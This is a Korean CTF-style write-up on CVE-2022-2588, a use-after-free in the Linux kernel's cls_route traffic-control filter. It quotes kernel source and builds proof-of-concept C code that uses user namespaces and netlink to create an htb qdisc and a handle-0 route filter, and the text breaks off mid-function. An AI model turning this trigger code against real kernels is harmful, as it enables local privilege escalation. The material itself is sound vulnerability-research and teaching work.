Table of Contents
Introduction #
0xCD4님은 Kernel CTF Lab의 문제 중 objstore로 CVE-2022-2588을 묘사했다. 이 취약점은 리눅스 커널의 Traffic Control (TC) 서브시스템에서 필터 기능을 수행하는 cls_route 모듈에서 발생한 use-after-free (UAF)이다. 본 글에서는 커널 5.18 버전을 기준으로 UAF가 어떻게 발생하는지 알아보고, proof-of-concept (PoC) 코드를 작성해볼 것이다[1, 2].
Root Cause Analysis #
Cls_route 모듈은 다음과 같이 route4_filter 구조체를 정의하여 필터를 연결 리스트로 다룬다 (net/sched/cls_route.c에서 발췌)[3].
1struct route4_filter {
2 struct route4_filter __rcu *next;
3 u32 id;
4 int iif;
5
6 struct tcf_result res;
7 struct tcf_exts exts;
8 u32 handle;
9 struct route4_bucket *bkt;
10 struct tcf_proto *tp;
11 struct rcu_work rwork;
12};
그리고 이 리스트의 헤드는 route4_head와 route4_bucket 구조체에 배열 형태로 구성되어 있다 (net/sched/cls_route.c에서 발췌)[3].
1struct route4_head {
2 struct route4_fastmap fastmap[16];
3 struct route4_bucket __rcu *table[256 + 1];
4 struct rcu_head rcu;
5};
6
7struct route4_bucket {
8 /* 16 FROM buckets + 16 IIF buckets + 1 wildcard bucket */
9 struct route4_filter __rcu *ht[16 + 16 + 1];
10 struct rcu_head rcu;
11};
이때 그 인덱스는 route4_filter 구조체의 handle 멤버 변수에 저장되는 값에 해시를 적용하여 얻는다. 이는 route4_get 함수 구현을 읽어보면 감을 잡을 수 있다 (net/sched/cls_route.c에서 발췌)[3].
1static void *route4_get(struct tcf_proto *tp, u32 handle)
2{
3 struct route4_head *head = rtnl_dereference(tp->root);
4 struct route4_bucket *b;
5 struct route4_filter *f;
6 unsigned int h1, h2;
7
8 h1 = to_hash(handle);
9 if (h1 > 256)
10 return NULL;
11
12 h2 = from_hash(handle >> 16);
13 if (h2 > 32)
14 return NULL;
15
16 b = rtnl_dereference(head->table[h1]);
17 if (b) {
18 for (f = rtnl_dereference(b->ht[h2]);
19 f;
20 f = rtnl_dereference(f->next))
21 if (f->handle == handle)
22 return f;
23 }
24 return NULL;
25}
Route4_change 함수는 tc_new_tfilter 함수가 change 함수 포인터로 호출하며, 새로 생성한 필터 (f 포인터 변수)로 기존의 필터 (fold 포인터 변수)를 대체한다. 문제는 기존 필터의 handle 멤버값이 0이면 리스트에서는 제거되지 않는데 ({1}), 메모리 해제는 된다 ({2})는 것이다 (net/sched/cls_route.c에서 발췌)[3].
1static int route4_change(struct net *net, struct sk_buff *in_skb,
2 struct tcf_proto *tp, unsigned long base, u32 handle,
3 struct nlattr **tca, void **arg, u32 flags,
4 struct netlink_ext_ack *extack)
5{
6 struct route4_head *head = rtnl_dereference(tp->root);
7 struct route4_filter __rcu **fp;
8 struct route4_filter *fold, *f1, *pfp, *f = NULL;
9 struct route4_bucket *b;
10 struct nlattr *opt = tca[TCA_OPTIONS];
11 struct nlattr *tb[TCA_ROUTE4_MAX + 1];
12 unsigned int h, th;
13 int err;
14 bool new = true;
15
16 /* ... */
17
18 fold = *arg;
19 if (fold && handle && fold->handle != handle)
20 return -EINVAL;
21
22 err = -ENOBUFS;
23 f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
24 if (!f)
25 goto errout;
26
27 /* ... */
28
29 if (fold) {
30 f->id = fold->id;
31 f->iif = fold->iif;
32 f->res = fold->res;
33 f->handle = fold->handle;
34
35 f->tp = fold->tp;
36 f->bkt = fold->bkt;
37 new = false;
38 }
39
40 /* ... */
41
42 if (fold && fold->handle && f->handle != fold->handle) { /* {1} */
43 th = to_hash(fold->handle);
44 h = from_hash(fold->handle >> 16);
45 b = rtnl_dereference(head->table[th]);
46 if (b) {
47 fp = &b->ht[h];
48 for (pfp = rtnl_dereference(*fp); pfp;
49 fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
50 if (pfp == fold) {
51 rcu_assign_pointer(*fp, fold->next);
52 break;
53 }
54 }
55 }
56 }
57
58 route4_reset_fastmap(head);
59 *arg = f;
60 if (fold) { /* {2} */
61 tcf_unbind_filter(tp, &fold->res);
62 tcf_exts_get_net(&fold->exts);
63 tcf_queue_work(&fold->rwork, route4_delete_filter_work);
64 }
65 return 0;
66
67errout:
68 if (f)
69 tcf_exts_destroy(&f->exts);
70 kfree(f);
71 return err;
72}
Proof of Concept #
User namespace and capabilities #
이 취약점을 트리거하기 위해서는 CAP_NETADMIN 이상의 권한이 필요하며, 이는 다음 소스로 확인할 수 있다 (net/sched/cls_api.c에서 발췌)[3].
1static int tc_new_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
2 struct netlink_ext_ack *extack)
3{
4 struct net *net = sock_net(skb->sk);
5
6 /* ... */
7
8 if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN))
9 return -EPERM;
10
11 /* ... */
12}
그리고 일반 사용자가 이 권한을 표면적으로라도 얻기 위해서는 새로운 네임스페이스로 옮겨가야 한다. 이 네임스페이스는 unshare 시스템 콜에 CLONE_NEWUSER | CLONE_NEWNET 플래그를 주어 얻을 수 있다[9, 10].
Netlink and rtnetlink #
Netlink는 사용자와 커널이 소통하기 위한 소켓 기반 인터페이스이다. Socket 시스템 콜의 protocol 파라미터가 여기서는 소통하고자 하는 서브시스템을 구분하는데 사용된다. 특히 여기서 다루는 TC 관련 기능에 접근할 때는 NETLINK_ROUTE로 지칭되는 rtnetlink를 쓴다. 이를 사용해서 커널과 통신할 때는 다음과 같은 형태의 메시지를 구성하여 전송한다[4, 5, 6].
1[ Netlink message header ][ Subsystem message header ][ Attributes ]
2
3@ Subsystem message header structures: struct tcmsg, etc.
위 Netlink message header는 nlmsghdr 구조체로 다음과 같이 정의돼 있다 (include/uapi/linux/netlink.h에서 발췌)[3].
1struct nlmsghdr {
2 __u32 nlmsg_len; /* Length of message including header */
3 __u16 nlmsg_type; /* Message content */
4 __u16 nlmsg_flags; /* Additional flags */
5 __u32 nlmsg_seq; /* Sequence number */
6 __u32 nlmsg_pid; /* Sending process port ID */
7};
그리고 Subsystem message header는 어느 서브시스템과 통신하는지에 따라 달라진다. 예를 들어, TC에 접근한다면 tcmsg 구조체를 쓰며, 다음과 같이 정의돼 있다 (include/uapi/linux/rtnetlink.h에서 발췌)[3].
1struct tcmsg {
2 unsigned char tcm_family;
3 unsigned char tcm__pad1;
4 unsigned short tcm__pad2;
5 int tcm_ifindex;
6 __u32 tcm_handle;
7 __u32 tcm_parent;
8/* tcm_block_index is used instead of tcm_parent
9 * in case tcm_ifindex == TCM_IFINDEX_MAGIC_BLOCK
10 */
11#define tcm_block_index tcm_parent
12 __u32 tcm_info;
13};
Attributes도 위와 마찬가지로 어떤 netlink로 메시지를 전송하는지에 따라 달라진다. 예를 들어, rtnetlink를 쓴다면, rtattr 구조체를 사용한다 (include/uapi/linux/rtnetlink.h에서 발췌)[3, 5].
1/*
2 Generic structure for encapsulation of optional route information.
3 It is reminiscent of sockaddr, but with sa_family replaced
4 with attribute type.
5 */
6
7struct rtattr {
8 unsigned short rta_len;
9 unsigned short rta_type;
10};
Rtnetlink는 RTM_ 메시지 타입군을 가지며, rtnl_register 함수를 사용하여 해당 메시지 타입에 동작할 함수를 매핑한다 (net/core/rtnetlink.c에서 발췌)[3, 5].
1/**
2 * rtnl_register - Register a rtnetlink message type
3 * @protocol: Protocol family or PF_UNSPEC
4 * @msgtype: rtnetlink message type
5 * @doit: Function pointer called for each request message
6 * @dumpit: Function pointer called for each dump request (NLM_F_DUMP) message
7 * @flags: rtnl_link_flags to modify behaviour of doit/dumpit functions
8 *
9 * Registers the specified function pointers (at least one of them has
10 * to be non-NULL) to be called whenever a request message for the
11 * specified protocol family and message type is received.
12 *
13 * The special protocol family PF_UNSPEC may be used to define fallback
14 * function pointers for the case when no entry for the specific protocol
15 * family exists.
16 */
17void rtnl_register(int protocol, int msgtype,
18 rtnl_doit_func doit, rtnl_dumpit_func dumpit,
19 unsigned int flags)
20{
21 int err;
22
23 err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
24 flags);
25 if (err)
26 pr_err("Unable to register rtnetlink message handler, "
27 "protocol = %d, message type = %d\n", protocol, msgtype);
28}
1void __init rtnetlink_init(void)
2{
3 /* ... */
4
5 rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
6 rtnl_dump_ifinfo, 0);
7 rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
8 rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
9 rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);
10
11 rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
12 rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
13 rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);
14
15 rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
16 rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);
17
18 rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
19 rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL, 0);
20 rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);
21
22 rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
23 rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
24 rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);
25
26 rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
27 0);
28 rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
29}
위와 같이 등록하는 것은 rtnetlink로 접근하는 TC 관련 API에도 있다. 예를 들어, classifier API는 필터 관련 타입을 등록한다 (net/sched/cls_api.c에서 발췌)[3].
1static int __init tc_filter_init(void)
2{
3 int err;
4
5 /* ... */
6
7 rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
8 RTNL_FLAG_DOIT_UNLOCKED);
9 rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
10 RTNL_FLAG_DOIT_UNLOCKED);
11 rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
12 tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
13 rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
14 rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
15 rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
16 tc_dump_chain, 0);
17
18 return 0;
19
20 /* ... */
21}
이러한 타입들을 nlmsghdr 구조체의 nlmsg_type 멤버에 담아서 전송하면 매핑된 함수가 호출된다.
Libnetlink examples #
Netlink 메시지를 직접 구성하여 전송하고 그 답신을 해석하려면 여러가지를 고려해야 한다. 그래서 메시지를 송수신하는 것은 이미 작성된 라이브러리 함수를 사용하는 편이 낫다고 볼 수 있다. moises-silva님은 이 목표에 가장 부합하는 예제를 소개했다. 이때, libnetlink.h와 libnetlink.c 파일은 iproute2 소스로부터 얻으면 된다[7, 8].
moises-silva님의 예제에서도 볼 수 있듯이, libnetlink를 사용하여 통신하는 것은 다음과 같이 일정한 틀을 가진다[7].
- Open rtnetlink (rtnl) handle
- Set netlink message header
- Set subsystem message header (e.g., tcmsg)
- Set attributes
- Call rtnl_talk function
- Close rtnetlink (rtnl) handle
그럼 이를 바탕으로 Queueing Discipline 정보를 읽는 예제를 작성해보자. 이때 iproute2의 tc_qdisc.c 파일을 참고하면 헤더를 어떻게 설정해야 하는지 알 수 있다. 이에 예제를 작성하면 다음과 같다[8].
1#define _GNU_SOURCE
2
3#include <stdio.h>
4#include <string.h>
5#include <stdlib.h>
6#include <stdint.h>
7#include <stdbool.h>
8#include <signal.h>
9#include <time.h>
10#include <sys/mman.h>
11#include <sys/types.h>
12#include <sys/utsname.h>
13#include <sys/wait.h>
14#include <sys/socket.h>
15#include <sys/ioctl.h>
16#include <sys/uio.h>
17#include <unistd.h>
18#include <sched.h>
19#include <fcntl.h>
20#include <syslog.h>
21#include <errno.h>
22#include <netinet/in.h>
23#include <arpa/inet.h>
24#include <net/if.h>
25#include <net/if_arp.h>
26#include <linux/if_link.h>
27#include <linux/neighbour.h>
28#include <linux/netconf.h>
29#include <linux/if_ether.h>
30#include <asm/types.h>
31#include <linux/netlink.h>
32#include <linux/rtnetlink.h>
33#include <libnl3/netlink/route/tc.h>
34#include <libnl3/netlink/route/qdisc.h>
35#include <libnl3/netlink/route/qdisc/tbf.h>
36
37/* ----------------------< libnetlink >--------------------------------- */
38
39struct rtnl_handle {
40 int fd;
41 struct sockaddr_nl local;
42 struct sockaddr_nl peer;
43 __u32 seq;
44 __u32 dump;
45 int proto;
46 FILE *dump_fp;
47#define RTNL_HANDLE_F_LISTEN_ALL_NSID 0x01
48 int flags;
49};
50
51#define NLMSG_TAIL(nmsg) \
52 ((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
53
54
55static inline const char *rta_getattr_str(const struct rtattr *rta)
56{
57 return (const char *)RTA_DATA(rta);
58}
59
60static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
61 int alen)
62{
63 int len = RTA_LENGTH(alen);
64 struct rtattr *rta;
65
66 if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
67 fprintf(stderr,
68 "addattr_l ERROR: message exceeded bound of %d\n",
69 maxlen);
70 return -1;
71 }
72 rta = NLMSG_TAIL(n);
73 rta->rta_type = type;
74 rta->rta_len = len;
75 memcpy(RTA_DATA(rta), data, alen);
76 n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
77 return 0;
78}
79
80static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
81{
82 return addattr_l(n, maxlen, type, &data, sizeof(__u32));
83}
84
85static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
86{
87 return addattr_l(n, maxlen, type, &data, sizeof(__u64));
88}
89
90static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
91{
92 struct rtattr *nest = NLMSG_TAIL(n);
93
94 addattr_l(n, maxlen, type, NULL, 0);
95 /* addattr_l(n, maxlen, type, &nest, 8); */
96 return nest;
97}
98
99static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
100{
101 nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
102 return n->nlmsg_len;
103}
104
105#ifndef SOL_NETLINK
106#define SOL_NETLINK 270
107#endif
108
109#ifndef MIN
110#define MIN(a, b) ((a) < (b) ? (a) : (b))
111#endif
112
113static int rcvbuf =1024 * 1024;
114
115static void rtnl_close(struct rtnl_handle *rth)
116{
117 if (rth->fd >= 0) {
118 close(rth->fd);
119 rth->fd = -1;
120 }
121}
122
123static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
124 int protocol)
125{
126 socklen_t addr_len;
127 int sndbuf = 32768;
128
129 memset(rth, 0, sizeof(*rth));
130
131 rth->proto = protocol;
132 rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
133 if (rth->fd < 0) {
134 perror("Cannot open netlink socket");
135 return -1;
136 }
137
138 if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
139 &sndbuf, sizeof(sndbuf)) < 0) {
140 perror("SO_SNDBUF");
141 return -1;
142 }
143
144 if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
145 &rcvbuf, sizeof(rcvbuf)) < 0) {
146 perror("SO_RCVBUF");
147 return -1;
148 }
149
150 memset(&rth->local, 0, sizeof(rth->local));
151 rth->local.nl_family = AF_NETLINK;
152 rth->local.nl_groups = subscriptions;
153
154 if (bind(rth->fd, (struct sockaddr *)&rth->local,
155 sizeof(rth->local)) < 0) {
156 perror("Cannot bind netlink socket");
157 return -1;
158 }
159 addr_len = sizeof(rth->local);
160 if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
161 &addr_len) < 0) {
162 perror("Cannot getsockname");
163 return -1;
164 }
165 if (addr_len != sizeof(rth->local)) {
166 fprintf(stderr, "Wrong address length %d\n", addr_len);
167 return -1;
168 }
169 if (rth->local.nl_family != AF_NETLINK) {
170 fprintf(stderr, "Wrong address family %d\n",
171 rth->local.nl_family);
172 return -1;
173 }
174 rth->seq = time(NULL);
175 return 0;
176}
177
178static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
179{
180 return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
181}
182
183static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
184 struct nlmsghdr *answer, size_t maxlen,
185 bool show_rtnl_err)
186{
187 int status;
188 unsigned int seq;
189 struct nlmsghdr *h;
190 struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
191 struct iovec iov = {
192 .iov_base = n,
193 .iov_len = n->nlmsg_len
194 };
195 struct msghdr msg = {
196 .msg_name = &nladdr,
197 .msg_namelen = sizeof(nladdr),
198 .msg_iov = &iov,
199 .msg_iovlen = 1,
200 };
201 char buf[32768] = {};
202
203 n->nlmsg_seq = seq = ++rtnl->seq;
204
205 if (answer == NULL)
206 n->nlmsg_flags |= NLM_F_ACK;
207
208 status = sendmsg(rtnl->fd, &msg, 0);
209 if (status < 0) {
210 perror("Cannot talk to rtnetlink");
211 return -1;
212 }
213
214 iov.iov_base = buf;
215 while (1) {
216 iov.iov_len = sizeof(buf);
217 status = recvmsg(rtnl->fd, &msg, 0);
218
219 if (status < 0) {
220 if (errno == EINTR || errno == EAGAIN)
221 continue;
222 fprintf(stderr, "netlink receive error %s (%d)\n",
223 strerror(errno), errno);
224 return -1;
225 }
226 if (status == 0) {
227 fprintf(stderr, "EOF on netlink\n");
228 return -1;
229 }
230 if (msg.msg_namelen != sizeof(nladdr)) {
231 fprintf(stderr,
232 "sender address length == %d\n",
233 msg.msg_namelen);
234 exit(1);
235 }
236 for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
237 int len = h->nlmsg_len;
238 int l = len - sizeof(*h);
239
240 /* DumpHex(&msg, len); */
241
242 if (l < 0 || len > status) {
243 if (msg.msg_flags & MSG_TRUNC) {
244 fprintf(stderr, "Truncated message\n");
245 return -1;
246 }
247 fprintf(stderr,
248 "!!!malformed message: len=%d\n",
249 len);
250 exit(1);
251 }
252
253 if (nladdr.nl_pid != 0 ||
254 h->nlmsg_pid != rtnl->local.nl_pid ||
255 h->nlmsg_seq != seq) {
256 /* Don't forget to skip that message. */
257 status -= NLMSG_ALIGN(len);
258 h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
259 continue;
260 }
261
262 if (h->nlmsg_type == NLMSG_ERROR) {
263 struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);
264
265 if (l < sizeof(struct nlmsgerr)) {
266 fprintf(stderr, "ERROR truncated\n");
267 } else if (!err->error) {
268 if (answer)
269 memcpy(answer, h,
270 MIN(maxlen, h->nlmsg_len));
271 return 0;
272 }
273
274 if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
275 fprintf(stderr,
276 "RTNETLINK answers: %s\n",
277 strerror(-err->error));
278 errno = -err->error;
279 return -1;
280 }
281
282 if (answer) {
283 memcpy(answer, h,
284 MIN(maxlen, h->nlmsg_len));
285 return 0;
286 }
287
288 fprintf(stderr, "Unexpected reply!!!\n");
289
290 status -= NLMSG_ALIGN(len);
291 h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
292 }
293
294 if (msg.msg_flags & MSG_TRUNC) {
295 fprintf(stderr, "Message truncated\n");
296 continue;
297 }
298
299 if (status) {
300 fprintf(stderr, "!!!Remnant of size %d\n", status);
301 exit(1);
302 }
303 }
304}
305
306static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
307 struct nlmsghdr *answer, size_t maxlen)
308{
309 return __rtnl_talk(rtnl, n, answer, maxlen, true);
310}
311
312static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
313 int len, unsigned short flags)
314{
315 unsigned short type;
316
317 memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
318 while (RTA_OK(rta, len)) {
319 type = rta->rta_type & ~flags;
320 if ((type <= max) && (!tb[type]))
321 tb[type] = rta;
322 rta = RTA_NEXT(rta, len);
323 }
324 if (len)
325 fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
326 len, rta->rta_len);
327 return 0;
328}
329
330/* --------------------------------------------------------------------- */
331
332enum {
333 TCA_BUF_MAX = (64 * 1024)
334};
335
336struct tc_req {
337 struct nlmsghdr hdr;
338 struct tcmsg tchdr;
339 uint8_t buf[TCA_BUF_MAX];
340};
341
342#define LOG printf
343#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
344
345void die(const char *funcname)
346{
347 perror(funcname);
348 exit(EXIT_FAILURE);
349}
350
351void print_qdisc_info(const char *ifname)
352{
353 int err;
354 struct nlmsghdr res;
355 struct tcmsg *t;
356 struct rtattr *tb[TCA_MAX + 1];
357 struct rtnl_handle rth;
358 struct tc_req qdreq;
359
360 LOG_FUNC();
361
362 /* 1. Open rtnl handle */
363 err = rtnl_open(&rth, 0);
364 if (err)
365 die("rtnl_open");
366
367 /* 2. Set netlink message header */
368 bzero(&qdreq, sizeof(qdreq));
369 qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
370 qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
371 qdreq.hdr.nlmsg_type = RTM_GETQDISC;
372
373 /* 3. Set subsystem message header */
374 qdreq.tchdr.tcm_family = AF_UNSPEC;
375 qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
376 printf("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);
377
378 /* 4. Set attributes (Not needed for this example) */
379
380 /* 5. Call rtnl_talk function */
381 err = rtnl_talk(&rth, &qdreq.hdr, &res, TCA_BUF_MAX);
382 if (err < 0)
383 die("rtnl_talk");
384
385 /* Parse and print response from the kernel */
386 t = NLMSG_DATA(&res);
387 if (res.nlmsg_type != RTM_NEWQDISC && res.nlmsg_type != RTM_DELQDISC)
388 die("Not a qdisc");
389
390 /* rtattr_parser(tb, */
391 /* TCA_MAX, */
392 /* TCA_RTA(t), */
393 /* res.nlmsg_len - NLMSG_LENGTH(sizeof(*t))); */
394 parse_rtattr_flags(tb, TCA_MAX, TCA_RTA(t), res.nlmsg_len - NLMSG_LENGTH(sizeof(*t)), NLA_F_NESTED);
395 printf("qdisc %s %x:[%08x]\n", rta_getattr_str(tb[TCA_KIND]),
396 t->tcm_handle >> 16, t->tcm_handle);
397
398 /* 6. Close rtnetlink handle */
399 rtnl_close(&rth);
400}
401
402int main()
403{
404 print_qdisc_info("lo");
405 return 0;
406}
Traffic Control Queueing Discipline #
Queueing discipline (Qdisc)은 커널이 패킷을 네트워크 어댑터 드라이버에 전달하기 전에 큐잉하는 규칙을 정의한다. 이때 클래스를 통해 큐에서 패킷을 가져올 때의 우선순위를 정할 수 있고, 이들을 classful qdisc라고 한다. 그리고 필터는 큐에 패킷을 넣을 때 어떤 클래스에 넣을지 분류하는 역할을 수행한다. 그래서 필터는 classful qdisc가 사용하고, 필터를 추가하려면 해당 네트워크 인터페이스의 qdisc가 classful 해야 한다[11].
경험적으로 루프백 디바이스는 qdisc가 noqueue로 설정되어 있거나, 설정되어 있지 않은 경우가 있음을 알 수 있다. 그래서 classful qdisc에 속하는 htb로 설정할 것이다. 이를 위해 설정해야 하는 요소들은 다음과 같다[3, 8].
| nlmsghdr member | Value |
|---|---|
| nlmsg_len | NLMSG_LENGTH(sizeof(< subsystem header structure variable >)) |
| nlmsg_flags | NLM_FREQUEST OR NLM_FCREATE |
| nlmsg_type | RTM_NEWQDISC |
| tcmsg member | Value |
|---|---|
| tcm_family | AF_UNSPEC |
| tcm_ifindex | ifindex of network interface |
| tcm_handle | 32-bit handle (e.g., 0x10000) |
| tcm_parent | parent or TC_HROOT |
| Attribute | Value |
|---|---|
| TCA_KIND | "htb" |
| TCA_OPTIONS | Not NULL |
| TCA_HTBINIT | Set by using tc_htbglob structure and version member shall be 0x30011 >> 16 |
위 표의 값을 설정하여 커널에 요청하는 함수는 다음과 같이 작성할 수 있다.
1enum {
2 TCA_BUF_MAX = (64 * 1024)
3};
4
5struct tc_req {
6 struct nlmsghdr hdr;
7 struct tcmsg tchdr;
8 uint8_t buf[TCA_BUF_MAX];
9};
10
11void die(const char *funcname)
12{
13 perror(funcname);
14 exit(EXIT_FAILURE);
15}
16
17#define LOG printf
18#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
19
20void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
21 uint32_t handle, const char *kind)
22{
23 int err;
24 struct rtnl_handle rth;
25 struct tc_req qdreq;
26 struct rtattr *tail;
27 struct tc_htb_glob glob;
28
29 LOG_FUNC();
30
31 err = rtnl_open(&rth, 0);
32 if (err)
33 die("rtnl_open");
34
35 qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
36 qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
37 qdreq.hdr.nlmsg_type = cmd;
38
39 qdreq.tchdr.tcm_family = AF_UNSPEC;
40 qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
41 qdreq.tchdr.tcm_handle = handle;
42 qdreq.tchdr.tcm_parent = TC_H_ROOT;
43
44 /* Set attributes */
45 addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
46 tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
47 bzero(&glob, sizeof(glob));
48 glob.version = 0x00030011 >> 16;
49 addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
50 &glob, sizeof(glob));
51 addattr_nest_end(&qdreq.hdr, tail);
52
53 err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
54 if (err < 0)
55 die("rtnl_talk");
56
57 rtnl_close(&rth);
58}
59
60int main(int argc, char *argv[])
61{
62 int res;
63
64 res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
65 if (res == -1)
66 die("unshare");
67
68 user_tc_modify_qdisc("lo",
69 RTM_NEWQDISC,
70 NLM_F_CREATE,
71 0x10000,
72 "htb");
73 return 0;
74}
75
Traffic Control Filter #
이 취약점은 handle이 0인 필터를 지울 때 발생가능하다. 그럴려면 이 필터를 생성해야 한다. 이를 위해 설정해야 하는 요소들은 다음과 같다[3, 8].
| nlmsghdr member | Value |
|---|---|
| nlmsg_len | NLMSG_LENGTH(sizeof(< subsystem header structure variable >)) |
| nlmsg_flags | NLM_FREQUEST OR NLM_FCREATE |
| nlmsg_type | RTM_NEWTFILTER |
| tcmsg member | Value |
|---|---|
| tcm_family | AF_UNSPEC |
| tcm_ifindex | ifindex of network interface |
| tcm_info | 32 bits value, which prio for high 16 bits that is not zero and proto for low 16 bits (e.g., prio=0xbeef and proto=ETH_PLOOP) |
| tcm_handle | 0x0 |
| Attribute | Value |
|---|---|
| TCA_KIND | "route" |
| TCA_OPTIONS | Not NULL |
| TCA_ROUTE4TO | 0x100000000 (64-bit) |
| TCA_ROUTE4FROM | 0x100000000 (64-bit) |
이때 prio는 route4_get 함수가 여러 번의 호출에도 같은 head 포인터를 얻기 위해 0이 아닌 값으로 설정한다. 이 작업을 수행하는 함수는 다음과 같이 작성할 수 있다[3].
1enum {
2 TCA_BUF_MAX = (64 * 1024)
3};
4
5struct tc_req {
6 struct nlmsghdr hdr;
7 struct tcmsg tchdr;
8 uint8_t buf[TCA_BUF_MAX];
9};
10
11void die(const char *funcname)
12{
13 perror(funcname);
14 exit(EXIT_FAILURE);
15}
16
17#define LOG printf
18#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
19
20void user_tc_new_tfilter(const char *ifname, int cmd,
21 unsigned int flags, uint32_t handle, uint16_t prio,
22 uint16_t proto,
23 const char *kind, uint64_t from, uint64_t to)
24{
25 int err;
26 struct rtnl_handle rthdle;
27 struct tc_req req;
28 struct rtattr *tail;
29
30 LOG_FUNC();
31
32 err = rtnl_open(&rthdle, 0);
33 if (err < 0)
34 die("rtnl_open");
35
36 bzero(&req, sizeof(req));
37 req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
38 req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
39 req.hdr.nlmsg_type = cmd;
40
41 req.tchdr.tcm_family = AF_UNSPEC;
42 req.tchdr.tcm_ifindex = if_nametoindex(ifname);
43 req.tchdr.tcm_info = TC_H_MAKE(prio << 16, proto);
44 req.tchdr.tcm_handle = handle;
45
46 addattr_l(&req.hdr, sizeof(req),
47 TCA_KIND,
48 kind, strlen(kind));
49 tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
50 addattr64(&req.hdr, sizeof(req),
51 TCA_ROUTE4_TO,
52 to);
53 addattr64(&req.hdr, sizeof(req),
54 TCA_ROUTE4_FROM,
55 from);
56 addattr_nest_end(&req.hdr, tail);
57
58 err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
59 if (err < 0)
60 die("rtnl_talk");
